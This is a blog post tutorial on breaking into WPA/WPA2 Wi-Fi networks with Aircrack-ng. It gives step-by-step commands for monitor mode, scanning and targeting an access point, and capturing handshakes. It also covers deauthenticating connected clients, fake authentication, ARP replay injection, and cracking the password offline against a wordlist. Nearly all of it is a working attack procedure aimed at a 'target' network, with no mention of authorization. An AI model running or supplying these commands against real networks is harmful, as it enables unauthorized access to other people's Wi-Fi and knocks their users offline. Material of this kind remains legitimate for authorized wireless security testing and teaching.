WPA/WPA2 Attack Using Aircrack, with data capture
In this attack, we will capture data wirelessly when someone logs into the router and use a wordlist to throw the data captured until the password is found.
We beginning our operation by setting the adapter into monitor mode:
airmon-ng start wlan0
If you wish to see any Routers or APs and devices, execute the command:
airodump-ng --uptime --manufacturer -a wlan0mon
where:
- uptime shows how long the devices have been on.
- manufacturer tells you the manufacturer of displayed device.
- -a will ignore any "not associated" clients e.g. ones using mobile data or having no password to the routers but are attempting to connect. If you wish to see such devices/clients just omit the -a.
In the Aircrack-ng suite of tools, the word station as you'll see in your scan results refers to clients or users in that wifi/router/Access Point(AP).
If you identify the target Access Point to attack, you can focus/narrow down to it with the command:
airodump-ng --essid <essid>/--bssid <bssid> --wps --uptime --manufacturer --showack -a wlan0mon
 |
| scanned APs |
where:
- --essid is the name of the wifi router/Access Point.
- --bssid is the MAC address of the AP.
- --wps gives us any available WPS information
- --showack will give us ack/cts/rts statistics of the device
We now set our adapter to do a data capture on the selected AP.
airodump-ng -c(channel) --bssid(BSSID of AP) -w(Filename ,handshake file) wlan0mon
The -w points towards the path and name of a file we want created that will store all data captured, all handshakes captured.
Speeding Things Up
Speeding things up will help us get more captured packets and in a shorter time. The more captured packets we have, the higher our chances of cracking the password.
We can speed things up by causing deauthentication of clients connected to the AP just to get more handshakes and get more data captures. We inject deauthentication frames into the network to deauthenticate a specific client or all clients using Airodump-ng.
aireplay-ng -0 5 -a(BSSID of AP) -c(BSSID of Client) wlan0mon
aireplay-ng --deauth 5 -a(BSSID of AP) -c(BSSID of Client) wlan0mon
 |
| Deauthenticating everyone in the wifi network using 5 packets |
- -0 is the syntax we use to mean deauthentication. Alternate is to use --deauth
- 5 tells of the number of deauthentication packets to send. This number can be arbitrary depending depending on you preference or by choosing 0, you send an infinite number of packets.
- -c by ommitting this bssid of clients, you deauthenticate everyone on the AP.
You can also speed things up by attempting to make an association. Aireplay-ng allows us to make a fake authentication with the AP.
aireplay-ng -1 0 -a(BSSID of AP) -h(MAC address of choice to use) -e(essid of choice to use) wlan0mon
 |
| A successful fake authentication attack on the wifi router |
- -1 syntax we use to mean performing a fake authentication
- -h allows us to put a MAC address of choice
We can also capture and retransmit ARP requests transmitted by a client. Arpreplay is the standard ARP request replay attack option.
aireplay-ng --arpreplay -b(BSSID) -h(Our Chosen Client MacAddress) wlan0mon
or
aireplay-ng -3 -b(BSSID) -h(Our Chosen Client MacAddress) wlan0mon
Cracking The Password
We'll use airodump-ng to capturre and save all captured traffic and later use aircrack-ng in combination with a wordlist to crack the password. We could try and wait for us to get above 20,000 packets for better results.
We capture and save the captured packets and handshakes into a file that we'll later use to crack the password by executing the command:
airodump-ng --bssid(MAC of AP) -c(channel) -w<fileName> wlan0mon
You can also use Aicrack-ng, but using IVS Packets only.
To capture IVS packets only, execute:
airodump-ng --channel --bssid -w(filename) --ivs wlan0mon
Optionally we can execute a little handshake inspection using wireshark as:
wireshark <fileName.cap>
Use the .cap file format with wireshark of the files generated by aircrack-ng to store the captured traffic.
 |
| Files created to store the captured traffic. Notice the file formats used |
aircrack-ng -b(BSSID of AP) (handshake filename) -w (wordlist filename path)
For a WEP router, this could have been easily:
aircrack-ng <fileName-01.cap>
For WPA/WPA2:
aircrack-ng -b(BSSID) (handshake filename) -w (wordlist filename)
e.g.
aircrack-ng -b 00:11:22:33:44:55 file-01.cap -w ./dict
For the wordlists, you can either have made your own to use, sometimes made with the help of crunch(comes in handy but be careful not to fill your hard drive when using it), or have downloaded one from the internet. Kali Linux does come with a few wordlists in the directory /usr/shre/wordlists.
From this point onwards, the success of ever cracking the password is only as likely as the quality of your wordlist.
No comments:
Post a Comment